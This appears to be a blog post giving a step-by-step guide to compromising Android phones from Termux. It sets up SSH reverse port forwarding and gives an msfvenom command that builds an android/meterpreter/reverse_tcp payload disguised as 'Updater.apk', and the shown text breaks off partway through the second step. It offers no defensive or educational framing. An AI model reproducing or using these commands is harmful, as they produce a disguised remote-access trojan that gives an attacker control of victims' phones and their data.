
Showing posts from May, 2020

HOW TO HACK Android Device with TermuX

Requirements 1).  Android 5.0  2).  TermuX Android App (Download it from  Play Store 3).  Installed Metasploit Framework in TermuX  4).  Active Internet/WiFi Connection 5).  TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage") 6).  MiXplorer (For signing APK file, Download it from  UpToDown Website ) 7).  MiX Signer (APK Signer for MiXplorer, Download it from  Play Store ) 8).  (Recommended) Use  Hacker`s Keyboard  for entering commands in TermuX easily. Step 1 Port Forwarding pkg install openssh — It will successfully install OpenSSH ssh -R (Desired_Port):localhost:(Desired_Port) —  Detail Below (Optional) Name this session: Port Forwarding Step 2 Creating APK File with Embedded Payload msfvenom -p android/meterpreter/reverse_tcp LPORT=4564 R > storage/downloads/Updater.apk — Link for Updater.apk is in next 3